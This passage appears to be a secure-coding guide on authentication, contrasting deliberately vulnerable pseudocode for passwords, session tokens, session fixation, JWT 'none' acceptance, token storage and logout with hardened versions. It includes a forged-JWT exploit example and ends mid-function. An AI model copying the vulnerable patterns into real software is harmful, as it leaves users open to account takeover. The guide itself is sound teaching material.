+ +**Impact Statistics:** + +- **75.8%** of developers believe AI-generated authentication code is secure (Snyk State of AI Security Survey 2024) +- **63%** of data breaches involve weak, default, or stolen credentials (Verizon DBIR 2024) +- Authentication bypasses represent **41%** of critical vulnerabilities in web applications (HackerOne Report) +- Average cost of a credential-stuffing breach: **$4.3 million** (Ponemon Institute) +- Only **23%** of AI-generated authentication code properly implements session invalidation on logout + +--- + +## BAD Examples: Multiple Manifestations + +### BAD Example 1: Weak Password Validation + +```pseudocode +// VULNERABLE: Minimal password requirements +function validatePassword(password): + if length(password) < 6: + return false + return true + +// VULNERABLE: Only checks length, no complexity +function registerUser(email, password): + if length(password) >= 8: // "Strong enough" + hashedPassword = hashPassword(password) + createUser(email, hashedPassword) + return success + return error("Password too short") + +// VULNERABLE: Pattern allows easy-to-guess passwords +function isValidPassword(password): + // Only requires one of each - easily satisfied by "Password1!" 
+ hasUpper = containsUppercase(password) + hasLower = containsLowercase(password) + hasNumber = containsNumber(password) + hasSpecial = containsSpecialChar(password) + + if hasUpper and hasLower and hasNumber and hasSpecial: + return true + return false + // Missing: dictionary check, common password check, breach check +``` + +**Why This Is Dangerous:** +- Allows passwords like "123456", "password", or "qwerty123" +- No protection against common password lists +- No check against known breached passwords (Have I Been Pwned) +- Pattern requirements are easily satisfied by predictable passwords ("Password1!") +- Attackers can crack weak passwords in seconds with modern hardware + +--- + +### BAD Example 2: Predictable Session Tokens + +```pseudocode +// VULNERABLE: Sequential session IDs +sessionCounter = 1000 + +function generateSessionId(): + sessionCounter = sessionCounter + 1 + return "session_" + toString(sessionCounter) + +// VULNERABLE: Time-based session generation +function createSessionToken(): + timestamp = getCurrentTimestamp() + return "sess_" + toString(timestamp) + +// VULNERABLE: Weak random source +function generateToken(): + return "token_" + toString(randomInteger(0, 999999)) + +// VULNERABLE: MD5 of predictable data +function createAuthToken(userId): + timestamp = getCurrentTimestamp() + return md5(toString(userId) + toString(timestamp)) + +// VULNERABLE: User-controlled seed +function generateSessionId(userId, email): + seed = userId + email + getCurrentDate() + return sha256(seed) // Deterministic - same inputs = same output +``` + +**Why This Is Dangerous:** +- Sequential IDs allow session enumeration—attacker can guess valid sessions +- Timestamp-based tokens can be predicted if attacker knows approximate creation time +- Weak random (Math.random, random.randint) is predictable with statistical analysis +- MD5 is fast to compute, enabling brute-force attacks +- User-controlled inputs in token generation allow attackers to predict tokens + 
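The determinism behind these bullets can be shown in a few lines of Python. This is a sketch under assumptions: `predictable_token` is a hypothetical stand-in for the MD5-of-user-ID-and-timestamp pattern above, and `secure_session_id` is an illustrative name for a generator built on the standard `secrets` module.

```python
import hashlib
import secrets


def predictable_token(user_id: int, timestamp: int) -> str:
    """Anti-pattern: derived from guessable inputs, so anyone can recompute it."""
    return hashlib.md5(f"{user_id}{timestamp}".encode()).hexdigest()


def secure_session_id() -> str:
    """256 bits from the OS CSPRNG, rendered as 64 hex characters."""
    return secrets.token_hex(32)


# An attacker who knows or guesses the inputs reproduces the token exactly.
victim_token = predictable_token(42, 1_700_000_000)
attacker_guess = predictable_token(42, 1_700_000_000)

# The secure variant has no inputs to guess; each call is independent.
first_id = secure_session_id()
second_id = secure_session_id()
```

Hashing does not add entropy: a strong hash over a small, guessable input space is still a small, guessable output space.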
+--- + +### BAD Example 3: Session Fixation Vulnerabilities + +```pseudocode +// VULNERABLE: Session ID not regenerated after login +function login(request): + email = request.body.email + password = request.body.password + + user = findUserByEmail(email) + if user and verifyPassword(password, user.hashedPassword): + // Using the SAME session ID from before authentication + request.session.userId = user.id + request.session.authenticated = true + return redirect("/dashboard") + return error("Invalid credentials") + +// VULNERABLE: Accepting session ID from URL parameter +function handleRequest(request): + sessionId = request.query.sessionId or request.cookies.sessionId + // Attacker can send victim: https://app.com/login?sessionId=attacker_controlled_session + session = loadSession(sessionId) + +// VULNERABLE: Not invalidating session on privilege change +function promoteToAdmin(request): + user = getCurrentUser(request) + user.role = "admin" + user.save() + // Same session continues - if session was compromised before, + // attacker now has admin access + return success("You are now an admin") +``` + +**Why This Is Dangerous:** +- Attacker sets session ID → victim logs in → attacker uses same session ID with victim's authenticated session +- URL-based session IDs can be logged in server logs, browser history, referrer headers +- Privilege escalation without session regeneration means compromised sessions gain elevated access + +--- + +### BAD Example 4: JWT "none" Algorithm Acceptance + +```pseudocode +// VULNERABLE: Decoding JWT without algorithm verification +function verifyJwt(token): + parts = token.split(".") + header = base64Decode(parts[0]) + payload = base64Decode(parts[1]) + + // Trusting the algorithm from the token header itself! + algorithm = header.alg + + if algorithm == "none": + return payload // No signature check! 
+ + signature = parts[2] + if verifySignature(payload, signature, algorithm): + return payload + return null + +// VULNERABLE: Using jwt library without specifying expected algorithm +function validateToken(token): + try: + // Library may accept 'none' algorithm if token specifies it + decoded = jwt.decode(token, secretKey) + return decoded + catch: + return null + +// VULNERABLE: Allowing multiple algorithms including none +function verifyToken(token, secret): + options = { + algorithms: ["HS256", "HS384", "HS512", "none"] // DANGEROUS + } + return jwt.verify(token, secret, options) +``` + +**Why This Is Dangerous:** +- Attacker modifies JWT header to specify `alg: "none"` and removes signature +- Server accepts unsigned token as valid +- This vulnerability has affected major JWT libraries across multiple languages +- Complete authentication bypass—attacker can impersonate any user + +**Exploit Example:** +```pseudocode +// Original legitimate token: +// Header: {"alg":"HS256","typ":"JWT"} +// Payload: {"sub":"1234","role":"user"} +// Signature: valid_signature_here + +// Attacker-modified token: +// Header: {"alg":"none","typ":"JWT"} ← Changed to "none" +// Payload: {"sub":"1234","role":"admin"} ← Changed to admin +// Signature: (empty) ← Removed + +// If server trusts header.alg, this forged token is accepted as valid +``` + +--- + +### BAD Example 5: Weak JWT Secrets + +```pseudocode +// VULNERABLE: Short/guessable secret +JWT_SECRET = "secret" + +// VULNERABLE: Common secrets from tutorials +JWT_SECRET = "your-256-bit-secret" +JWT_SECRET = "supersecretkey" +JWT_SECRET = "jwt-secret-key" + +// VULNERABLE: Empty or null secret +function createToken(payload): + secret = getConfig("JWT_SECRET") or "" // Falls back to empty string + return jwt.sign(payload, secret, {algorithm: "HS256"}) + +// VULNERABLE: Secret derived from predictable data +function getJwtSecret(): + return sha256(APPLICATION_NAME + "-" + ENVIRONMENT) + // If attacker knows app name and 
environment, they can derive the secret + +// VULNERABLE: Same secret for signing and encryption +JWT_SECRET = "shared_secret_for_everything" +function signToken(payload): + return jwt.sign(payload, JWT_SECRET) +function encryptData(data): + return aesEncrypt(data, JWT_SECRET) // Key reuse vulnerability +``` + +**Why This Is Dangerous:** +- Weak secrets can be brute-forced or found in wordlists +- Common tutorial secrets are in public databases of JWT secrets +- Empty secrets may be accepted by some JWT libraries +- Secret compromise allows forging any JWT—complete authentication bypass +- Key reuse across different cryptographic operations violates security principles + +--- + +### BAD Example 6: Token Storage in localStorage + +```pseudocode +// VULNERABLE: Storing JWT in localStorage +function handleLoginResponse(response): + accessToken = response.data.accessToken + refreshToken = response.data.refreshToken + + // localStorage is accessible to ANY JavaScript on the page + localStorage.setItem("access_token", accessToken) + localStorage.setItem("refresh_token", refreshToken) + + // Also stored user data in localStorage + localStorage.setItem("user", JSON.stringify(response.data.user)) + +// VULNERABLE: Retrieving token for API calls +function apiRequest(endpoint, data): + token = localStorage.getItem("access_token") + return fetch(endpoint, { + headers: { + "Authorization": "Bearer " + token + }, + body: JSON.stringify(data) + }) + +// VULNERABLE: Token in sessionStorage (same problem) +function storeToken(token): + sessionStorage.setItem("jwt", token) +``` + +**Why This Is Dangerous:** +- localStorage is accessible to any JavaScript running on the page +- XSS vulnerability = complete authentication compromise +- Tokens persist across browser sessions (localStorage) +- No protection against browser extensions reading storage +- Refresh tokens in localStorage allow long-term account takeover + +--- + +### BAD Example 7: Missing Token Expiration + +```pseudocode 
+// VULNERABLE: JWT without expiration +function createUserToken(user): + payload = { + userId: user.id, + email: user.email, + role: user.role + // No "exp" claim! + } + return jwt.sign(payload, JWT_SECRET) + +// VULNERABLE: Extremely long expiration +function generateToken(user): + payload = { + sub: user.id, + iat: now(), + exp: now() + (365 * 24 * 60 * 60) // 1 year expiration + } + return jwt.sign(payload, JWT_SECRET) + +// VULNERABLE: Trusting token-provided expiration without server check +function validateToken(token): + decoded = jwt.verify(token, JWT_SECRET) + // JWT library checks exp, but server has no session to revoke + // Compromised tokens valid until natural expiration + return decoded + +// VULNERABLE: No mechanism to invalidate tokens +function logout(request): + response.clearCookie("token") + return success("Logged out") + // Token is still valid! Anyone with the token can still use it +``` + +**Why This Is Dangerous:** +- Tokens without expiration are valid forever if secret isn't changed +- Long-lived tokens give attackers extended exploitation windows +- No server-side invalidation means compromised tokens can't be revoked +- Logout only removes token from client but doesn't invalidate it +- Stolen tokens remain valid even after password change + +--- + +## GOOD Examples: Secure Authentication Patterns + +### GOOD Example 1: Strong Password Requirements Pattern + +```pseudocode +// SECURE: Comprehensive password validation +import commonPasswordList from "common-passwords-database" +import breachedPasswordApi from "haveibeenpwned-api" + +function validatePasswordStrength(password): + errors = [] + + // Minimum length (NIST recommends 8+, many orgs use 12+) + if length(password) < 12: + errors.push("Password must be at least 12 characters") + + // Maximum length (prevent DoS from hashing extremely long passwords) + if length(password) > 128: + errors.push("Password cannot exceed 128 characters") + + // Check against common password list 
(10,000+ passwords) + if password.toLowerCase() in commonPasswordList: + errors.push("This password is too common") + + // Check against user-specific data (optional but recommended) + // - Don't allow email prefix as password + // - Don't allow username as password + + // Check against breached passwords (Have I Been Pwned API) + if await checkBreachedPassword(password): + errors.push("This password has appeared in a data breach") + + if length(errors) > 0: + return { valid: false, errors: errors } + + return { valid: true, errors: [] } + +// SECURE: Check breached passwords using k-anonymity (no password exposure) +async function checkBreachedPassword(password): + // Hash password with SHA-1 (HIBP API requirement) + hash = sha1(password).toUpperCase() + prefix = hash.substring(0, 5) + suffix = hash.substring(5) + + // Only send the first 5 hash characters - k-anonymity preserves privacy + response = await fetch("https://api.pwnedpasswords.com/range/" + prefix) + hashes = await response.text() // Reading the body is asynchronous too + + // Check if our suffix appears in the returned hashes (format: SUFFIX:COUNT) + for line in hashes.split("\n"): + parts = line.split(":") + if parts[0] == suffix: + return true // Password has been breached + + return false + +// SECURE: Password hashing with proper algorithm +function hashPassword(password): + // bcrypt with cost factor of 12 (adjust based on hardware) + // Alternatively: argon2id with recommended parameters + return bcrypt.hash(password, 12) + +function verifyPassword(password, hash): + return bcrypt.compare(password, hash) +``` + +**Why This Is Secure:** +- Length requirements block trivially short passwords +- Common password checking blocks dictionary attacks +- Breach checking rejects passwords exposed in known breaches, reducing credential-stuffing risk +- k-anonymity ensures the password isn't exposed during the breach check +- bcrypt/argon2 provides proper password hashing with work factor + +--- + +### GOOD Example 2: Secure Session Generation + +```pseudocode +// SECURE: Cryptographically random session IDs +import 
cryptoRandom from "secure-random-library" + +function generateSessionId(): + // 256 bits of cryptographically secure randomness + // Represented as 64 hex characters + randomBytes = cryptoRandom.getRandomBytes(32) + return bytesToHex(randomBytes) + +// SECURE: Session creation with proper attributes +function createSession(userId): + sessionId = generateSessionId() + + sessionData = { + id: sessionId, + userId: userId, + createdAt: now(), + expiresAt: now() + SESSION_DURATION, // e.g., 24 hours + lastActivityAt: now(), + ipAddress: getClientIP(), + userAgent: getUserAgent() + } + + // Store in server-side session store (Redis, database, etc.) + sessionStore.save(sessionId, sessionData) + + return sessionId + +// SECURE: Session ID regeneration after authentication +function login(request): + email = request.body.email + password = request.body.password + + user = findUserByEmail(email) + if not user: + return error("Invalid credentials") // Don't reveal if email exists + + if not verifyPassword(password, user.hashedPassword): + recordFailedLogin(user.id, getClientIP()) + return error("Invalid credentials") + + // CRITICAL: Destroy old session and create new one + if request.session.id: + sessionStore.delete(request.session.id) + + // Generate completely new session ID after authentication + newSessionId = createSession(user.id) + + // Set session cookie with secure attributes + response.setCookie("session_id", newSessionId, { + httpOnly: true, // Prevent XSS access + secure: true, // HTTPS only + sameSite: "Strict", // CSRF protection + path: "/", + maxAge: SESSION_DURATION + }) + + return redirect("/dashboard") + +// SECURE: Session regeneration on privilege change +function changeUserRole(request, newRole): + user = getCurrentUser(request) + + // Change the role + user.role = newRole + user.save() + + // Regenerate session to bind new privileges to fresh session + oldSessionId = request.cookies.session_id + sessionStore.delete(oldSessionId) + + newSessionId = 
createSession(user.id) + + response.setCookie("session_id", newSessionId, { + httpOnly: true, + secure: true, + sameSite: "Strict" + }) + + return success("Role updated") +``` + +**Why This Is Secure:** +- Cryptographically random session IDs prevent prediction/enumeration +- Session regeneration after login prevents session fixation +- Privilege changes trigger session regeneration +- Secure cookie attributes prevent common attack vectors +- Server-side session storage allows proper invalidation + +--- + +### GOOD Example 3: Proper JWT Validation + +```pseudocode +// SECURE: JWT configuration with strict settings +JWT_CONFIG = { + secret: getEnv("JWT_SECRET"), // 256+ bit secret from environment + algorithms: ["HS256"], // Single allowed algorithm - explicit! + issuer: "myapp.example.com", + audience: "myapp-users", + expiresIn: "15m" // Short-lived access tokens +} + +// SECURE: Token creation with explicit claims +function createAccessToken(user): + payload = { + sub: toString(user.id), + email: user.email, + role: user.role, + iss: JWT_CONFIG.issuer, + aud: JWT_CONFIG.audience, + iat: now(), + exp: now() + (15 * 60), // 15 minutes + jti: generateUUID() // Unique token ID for revocation + } + + return jwt.sign(payload, JWT_CONFIG.secret, { + algorithm: "HS256" // Explicit algorithm + }) + +// SECURE: Token verification with all claims checked +function verifyAccessToken(token): + try: + decoded = jwt.verify(token, JWT_CONFIG.secret, { + algorithms: ["HS256"], // ONLY accept HS256 + issuer: JWT_CONFIG.issuer, + audience: JWT_CONFIG.audience, + complete: true // Return header + payload + }) + + // Additional validation + if not decoded.payload.sub: + return { valid: false, error: "Missing subject" } + + if not decoded.payload.role: + return { valid: false, error: "Missing role" } + + // Check against token blacklist (for logout/revocation) + if await isTokenRevoked(decoded.payload.jti): + return { valid: false, error: "Token revoked" } + + return { valid: true, 
payload: decoded.payload } + + catch JwtExpiredError: + return { valid: false, error: "Token expired" } + catch JwtInvalidError as e: + return { valid: false, error: "Invalid token: " + e.message } + +// SECURE: Refresh token handling +function createRefreshToken(user, sessionId): + payload = { + sub: toString(user.id), + sid: sessionId, // Bind to session for revocation + type: "refresh", + iat: now(), + exp: now() + (7 * 24 * 60 * 60) // 7 days + } + + token = jwt.sign(payload, JWT_CONFIG.secret + "_refresh", { + algorithm: "HS256" + }) + + // Store refresh token hash in database for revocation + tokenHash = sha256(token) + storeRefreshToken(user.id, sessionId, tokenHash, payload.exp) + + return token + +// SECURE: Refresh flow with rotation +function refreshAccessToken(refreshToken): + try: + decoded = jwt.verify(refreshToken, JWT_CONFIG.secret + "_refresh", { + algorithms: ["HS256"] + }) + + // Verify refresh token is still valid in database + tokenHash = sha256(refreshToken) + storedToken = getRefreshToken(decoded.sub, tokenHash) + + if not storedToken or storedToken.revoked: + return { error: "Refresh token invalid or revoked" } + + // Rotate refresh token (issue new one, revoke old) + revokeRefreshToken(tokenHash) + + user = findUserById(decoded.sub) + newAccessToken = createAccessToken(user) + newRefreshToken = createRefreshToken(user, decoded.sid) + + return { + accessToken: newAccessToken, + refreshToken: newRefreshToken + } + + catch: + return { error: "Invalid refresh token" } +``` + +**Why This Is Secure:** +- Explicit algorithm specification prevents algorithm confusion attacks +- Short-lived access tokens minimize exposure window +- JTI (JWT ID) enables token revocation +- Refresh token rotation limits reuse attacks +- Complete claim validation (iss, aud, exp, sub) +- Separate secrets for access and refresh tokens + +--- + +### GOOD Example 4: HttpOnly Secure Cookie Usage + +```pseudocode +// SECURE: Cookie-based session with proper attributes 
+function setSessionCookie(response, sessionId): + response.setCookie("session_id", sessionId, { + httpOnly: true, // Cannot be accessed via JavaScript + secure: true, // Only sent over HTTPS + sameSite: "Strict", // Not sent with cross-site requests + path: "/", // Available for all paths + domain: ".myapp.com", // Scoped to main domain and subdomains + maxAge: 24 * 60 * 60 // 24 hours in seconds + }) + +// SECURE: JWT in cookie (not localStorage) +function setAuthCookies(response, accessToken, refreshToken): + // Access token - short lived, same-site strict + response.setCookie("access_token", accessToken, { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/", + maxAge: 15 * 60 // 15 minutes + }) + + // Refresh token - limited path to reduce exposure + response.setCookie("refresh_token", refreshToken, { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/auth/refresh", // Only sent to refresh endpoint + maxAge: 7 * 24 * 60 * 60 // 7 days + }) + +// SECURE: Cookie cleanup on logout +function clearAuthCookies(response): + // Set cookies with immediate expiration + response.setCookie("access_token", "", { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/", + maxAge: 0 // Immediate expiration + }) + + response.setCookie("refresh_token", "", { + httpOnly: true, + secure: true, + sameSite: "Strict", + path: "/auth/refresh", + maxAge: 0 + }) + +// SECURE: SameSite considerations for cross-origin needs +function setCookieForOAuth(response, stateToken): + // OAuth requires cookies to work across redirects + // Use Lax instead of Strict when necessary + response.setCookie("oauth_state", stateToken, { + httpOnly: true, + secure: true, + sameSite: "Lax", // Allows top-level navigation + path: "/auth/callback", + maxAge: 10 * 60 // 10 minutes for OAuth flow + }) +``` + +**Why This Is Secure:** +- HttpOnly prevents XSS from stealing tokens +- Secure flag ensures HTTPS-only transmission +- SameSite prevents CSRF attacks +- Path 
restriction limits which requests include the cookie +- Short maxAge limits exposure window +- Deliberate domain scoping controls which subdomains receive the cookie (omit `domain` to restrict it to the exact host) + +--- + +### GOOD Example 5: Token Refresh Patterns + +```pseudocode +// SECURE: Complete token refresh implementation +class AuthenticationService: + + ACCESS_TOKEN_DURATION = 15 * 60 // 15 minutes + REFRESH_TOKEN_DURATION = 7 * 24 * 60 * 60 // 7 days + REFRESH_TOKEN_REUSE_WINDOW = 60 // 1 minute grace period + + function login(email, password): + user = validateCredentials(email, password) + if not user: + return { error: "Invalid credentials" } + + // Create session for tracking + session = createSession(user.id) + + // Generate token pair + accessToken = createAccessToken(user) + refreshToken = createRefreshToken(user, session.id) + + return { + accessToken: accessToken, + refreshToken: refreshToken, + expiresIn: ACCESS_TOKEN_DURATION + } + + function refresh(refreshToken): + // Validate refresh token + decoded = verifyRefreshToken(refreshToken) + if not decoded.valid: + return { error: decoded.error } + + // Check token in database + tokenRecord = getRefreshTokenRecord(decoded.jti) + + if not tokenRecord: + // Token doesn't exist - possible theft, invalidate session + invalidateSessionTokens(decoded.sid) + return { error: "Invalid refresh token" } + + if tokenRecord.revoked: + // Reuse of revoked token - likely theft + // Revoke ALL tokens for this session + invalidateSessionTokens(decoded.sid) + logSecurityEvent("Refresh token reuse detected", decoded.sub) + return { error: "Security violation detected" } + + if tokenRecord.usedAt: + // Token was already used - check if within grace period + if now() - tokenRecord.usedAt > REFRESH_TOKEN_REUSE_WINDOW: + // Outside grace period - potential theft + invalidateSessionTokens(decoded.sid) + return { error: "Refresh token already used" } + // Within grace period - return the same tokens (tolerates concurrent or retried requests) + return tokenRecord.lastIssuedTokens + + // Mark token as used + 
tokenRecord.usedAt = now() + tokenRecord.save() + + // Generate new token pair (rotation) + user = findUserById(decoded.sub) + newAccessToken = createAccessToken(user) + newRefreshToken = createRefreshToken(user, decoded.sid) + + // Store new tokens for replay protection + tokenRecord.lastIssuedTokens = { + accessToken: newAccessToken, + refreshToken: newRefreshToken + } + tokenRecord.save() + + // Revoke old refresh token (after grace period, it's invalid) + scheduleTokenRevocation(decoded.jti, REFRESH_TOKEN_REUSE_WINDOW) + + return { + accessToken: newAccessToken, + refreshToken: newRefreshToken, + expiresIn: ACCESS_TOKEN_DURATION + } + + function logout(accessToken, refreshToken): + // Revoke access token (add to blacklist until expiry) + decoded = decodeToken(accessToken) + if decoded: + blacklistToken(decoded.jti, decoded.exp) + + // Revoke refresh token immediately + refreshDecoded = decodeToken(refreshToken) + if refreshDecoded: + revokeRefreshToken(refreshDecoded.jti) + + // Optionally invalidate entire session + if refreshDecoded and refreshDecoded.sid: + invalidateSession(refreshDecoded.sid) + + return { success: true } + + function logoutAll(userId): + // Invalidate all sessions for user (password change, security concern) + sessions = getSessionsForUser(userId) + for session in sessions: + invalidateSessionTokens(session.id) + deleteSession(session.id) + + return { success: true, sessionsInvalidated: length(sessions) } +``` + +**Why This Is Secure:** +- Refresh token rotation limits reuse attacks +- Token reuse detection identifies potential theft +- Grace period prevents legitimate concurrent request issues +- Complete logout invalidates tokens server-side +- Session binding allows "logout from all devices" + +--- + +### GOOD Example 6: Proper Logout (Token Invalidation) + +```pseudocode +// SECURE: Complete logout implementation +function logout(request): + // Get current session/tokens + accessToken = request.cookies.access_token + refreshToken = 
request.cookies.refresh_token + sessionId = request.session.id + + // Revoke access token (add to blacklist) + if accessToken: + decoded = decodeToken(accessToken) + if decoded: + // Add to Redis/cache blacklist with TTL matching token expiry + blacklistToken(decoded.jti, decoded.exp - now()) + + // Revoke refresh token in database + if refreshToken: + refreshDecoded = decodeToken(refreshToken) + if refreshDecoded: + markRefreshTokenRevoked(refreshDecoded.jti) + + // Delete server-side session + if sessionId: + sessionStore.delete(sessionId) + + // Clear client cookies + response = new Response() + clearAuthCookies(response) + + return response.redirect("/login") + +// SECURE: Token blacklist with automatic expiry +class TokenBlacklist: + // Use Redis or similar with TTL support + + function add(tokenId, ttlSeconds): + redis.setex("blacklist:" + tokenId, ttlSeconds, "revoked") + + function isBlacklisted(tokenId): + return redis.exists("blacklist:" + tokenId) + +// SECURE: Middleware to check token validity +function authMiddleware(request, next): + accessToken = request.cookies.access_token + + if not accessToken: + return redirect("/login") + + decoded = verifyAccessToken(accessToken) + + if not decoded.valid: + return redirect("/login") + + // Check blacklist + if tokenBlacklist.isBlacklisted(decoded.payload.jti): + return redirect("/login") + + // Token is valid and not revoked + request.user = decoded.payload + return next(request) + +// SECURE: Logout from all sessions +function logoutAllSessions(request): + userId = request.user.sub + + // Get all active sessions for user + sessions = sessionStore.findByUserId(userId) + + // Revoke all refresh tokens + refreshTokens = getRefreshTokensForUser(userId) + for token in refreshTokens: + markRefreshTokenRevoked(token.jti) + + // Delete all sessions + for session in sessions: + sessionStore.delete(session.id) + + // Add all user's recent access tokens to blacklist + // This requires tracking issued tokens or using 
short expiry + invalidateAllAccessTokensForUser(userId) + + return success("Logged out from all devices") +``` + +**Why This Is Secure:** +- Server-side revocation makes logout effective immediately +- Blacklist prevents continued use of revoked tokens +- Automatic TTL cleanup prevents blacklist bloat +- "Logout from all devices" handles session compromise +- Cookie clearing removes client-side references + +--- + +## Edge Cases Section + +### Edge Case 1: Race Conditions in Authentication + +```pseudocode +// VULNERABLE: Race condition in login attempts +function login(email, password): + user = findUserByEmail(email) + failedAttempts = getFailedAttempts(email) + + if failedAttempts >= MAX_ATTEMPTS: + return error("Account locked") + + // Race condition: two requests check simultaneously, + // both see failedAttempts = 4, both proceed + if not verifyPassword(password, user.hashedPassword): + incrementFailedAttempts(email) // Not atomic! + return error("Invalid credentials") + + resetFailedAttempts(email) + return success() + +// SECURE: Atomic rate limiting +function loginWithAtomicRateLimit(email, password): + // Atomic increment and check in single operation + result = redis.eval(` + local attempts = redis.call('INCR', KEYS[1]) + if attempts == 1 then + redis.call('EXPIRE', KEYS[1], 900) -- 15 minute window + end + return attempts + `, ["login_attempts:" + email]) + + if result > MAX_ATTEMPTS: + return error("Too many attempts. 
Try again later.") + + user = findUserByEmail(email) + if not user or not verifyPassword(password, user.hashedPassword): + return error("Invalid credentials") + + // Reset on success + redis.del("login_attempts:" + email) + return success() + +// VULNERABLE: Race condition in concurrent session check +function login(email, password, request): + user = authenticate(email, password) + + activeSessions = countActiveSessions(user.id) + if activeSessions >= MAX_SESSIONS: + return error("Too many active sessions") + + // Race: two logins pass the check simultaneously + createSession(user.id) // Now user has MAX_SESSIONS + 1 + return success() + +// SECURE: Use database constraints or atomic operations +function loginWithSessionLimit(email, password, request): + user = authenticate(email, password) + + // Use transaction with row lock + transaction.start() + try: + activeSessions = countActiveSessionsForUpdate(user.id) // SELECT FOR UPDATE + if activeSessions >= MAX_SESSIONS: + transaction.rollback() + return error("Too many sessions") + + createSession(user.id) + transaction.commit() + return success() + catch: + transaction.rollback() + throw +``` + +--- + +### Edge Case 2: Timing Attacks on Password Comparison + +```pseudocode +// VULNERABLE: Early return reveals password length information +function verifyPassword_vulnerable(input, stored): + if length(input) != length(stored): + return false // Fast return reveals length mismatch + + for i in range(length(input)): + if input[i] != stored[i]: + return false // Fast return reveals first different character + + return true + +// VULNERABLE: String comparison has timing differences +function checkPassword_vulnerable(password, hash): + computedHash = sha256(password) + return computedHash == hash // == operator may short-circuit + +// SECURE: Constant-time comparison +function constantTimeEquals(a, b): + if length(a) != length(b): + // Still need length check, but make it constant-time + b = b + repeat("\0", max(0, 
length(a) - length(b))) + a = a + repeat("\0", max(0, length(b) - length(a))) + + result = 0 + for i in range(length(a)): + result = result | (charCode(a[i]) ^ charCode(b[i])) + + return result == 0 + +// SECURE: Use library-provided constant-time comparison +function verifyPassword_secure(password, hashedPassword): + // bcrypt.compare is designed to be constant-time + return bcrypt.compare(password, hashedPassword) + +// SECURE: Use crypto library's timingSafeEqual +function verifyHash(input, expected): + inputHash = sha256(input) + return crypto.timingSafeEqual( + Buffer.from(inputHash, 'hex'), + Buffer.from(expected, 'hex') + ) +``` + +--- + +### Edge Case 3: Password Reset Token Issues + +```pseudocode +// VULNERABLE: Predictable reset token +function createResetToken_vulnerable(userId): + token = md5(toString(userId) + toString(now())) + expiry = now() + (60 * 60) // 1 hour + saveResetToken(userId, token, expiry) + return token + +// VULNERABLE: Token doesn't expire on use +function resetPassword_vulnerable(token, newPassword): + resetRecord = getResetToken(token) + if resetRecord and resetRecord.expiry > now(): + user = findUserById(resetRecord.userId) + user.hashedPassword = hashPassword(newPassword) + user.save() + // Token not invalidated! Can be reused + return success() + return error("Invalid token") + +// VULNERABLE: Token not invalidated on password change +function changePassword(userId, oldPassword, newPassword): + user = findUserById(userId) + if verifyPassword(oldPassword, user.hashedPassword): + user.hashedPassword = hashPassword(newPassword) + user.save() + // Existing reset tokens still valid! 
+ return success() + return error("Wrong password") + +// SECURE: Complete password reset implementation +function createResetToken_secure(userId): + // Generate cryptographically random token + token = generateSecureRandom(32) // 256 bits + tokenHash = sha256(token) // Store hash, not token + expiry = now() + (15 * 60) // 15 minutes + + // Invalidate any existing reset tokens + deleteResetTokensForUser(userId) + + // Store hashed token + saveResetToken(userId, tokenHash, expiry) + + // Return plaintext token for email (store hash only) + return token + +function resetPassword_secure(token, newPassword): + tokenHash = sha256(token) + resetRecord = getResetTokenByHash(tokenHash) + + if not resetRecord: + return error("Invalid token") + + if resetRecord.expiry < now(): + deleteResetToken(tokenHash) + return error("Token expired") + + if resetRecord.used: + return error("Token already used") + + // Validate new password strength + validation = validatePasswordStrength(newPassword) + if not validation.valid: + return error(validation.errors) + + user = findUserById(resetRecord.userId) + + // Update password + user.hashedPassword = hashPassword(newPassword) + user.passwordChangedAt = now() + user.save() + + // Mark token as used (or delete) + resetRecord.used = true + resetRecord.save() + + // Invalidate all existing sessions + invalidateAllSessionsForUser(user.id) + + // Invalidate all refresh tokens + revokeAllRefreshTokensForUser(user.id) + + // Send notification email + sendPasswordChangedNotification(user.email) + + return success() +``` + +--- + +### Edge Case 4: OAuth State Parameter Issues + +```pseudocode +// VULNERABLE: No state parameter - CSRF possible +function initiateOAuth_vulnerable(): + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&redirect_uri=" + CALLBACK_URL + + "&scope=email profile" + return redirect(redirectUrl) + +// VULNERABLE: Predictable state +function initiateOAuth_weakState(): + state = toString(now()) // Predictable! 
+ storeState(state) + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&state=" + state + + "&redirect_uri=" + CALLBACK_URL + return redirect(redirectUrl) + +// VULNERABLE: State not validated on callback +function handleCallback_vulnerable(request): + code = request.query.code + // state parameter ignored! + tokens = exchangeCodeForTokens(code) + return loginWithTokens(tokens) + +// VULNERABLE: State reuse possible +function handleCallback_reuseVulnerable(request): + code = request.query.code + state = request.query.state + + if isValidState(state): // Just checks if it exists + // Doesn't delete/invalidate state after use + tokens = exchangeCodeForTokens(code) + return loginWithTokens(tokens) + + return error("Invalid state") + +// SECURE: Complete OAuth implementation +function initiateOAuth_secure(request): + // Generate random state + state = generateSecureRandom(32) + + // Bind state to user's session (CSRF protection) + request.session.oauthState = state + request.session.oauthStateCreatedAt = now() + + // Optional: include nonce for ID token validation + nonce = generateSecureRandom(32) + request.session.oauthNonce = nonce + + redirectUrl = OAUTH_PROVIDER_URL + + "?client_id=" + CLIENT_ID + + "&response_type=code" + + "&redirect_uri=" + encodeURIComponent(CALLBACK_URL) + + "&scope=" + encodeURIComponent("openid email profile") + + "&state=" + state + + "&nonce=" + nonce + + return redirect(redirectUrl) + +async function handleCallback_secure(request): + code = request.query.code + state = request.query.state + oauthError = request.query.error // Named oauthError so it doesn't shadow the error() helper + + // Check for OAuth error + if oauthError: + logOAuthError(oauthError, request.query.error_description) + return redirect("/login?error=oauth_failed") + + // Validate state + if not state: + return error("Missing state parameter") + + storedState = request.session.oauthState + stateCreatedAt = request.session.oauthStateCreatedAt + + // Reject if no state was stored; otherwise compare in constant time + if not storedState or not constantTimeEquals(state, storedState): + 
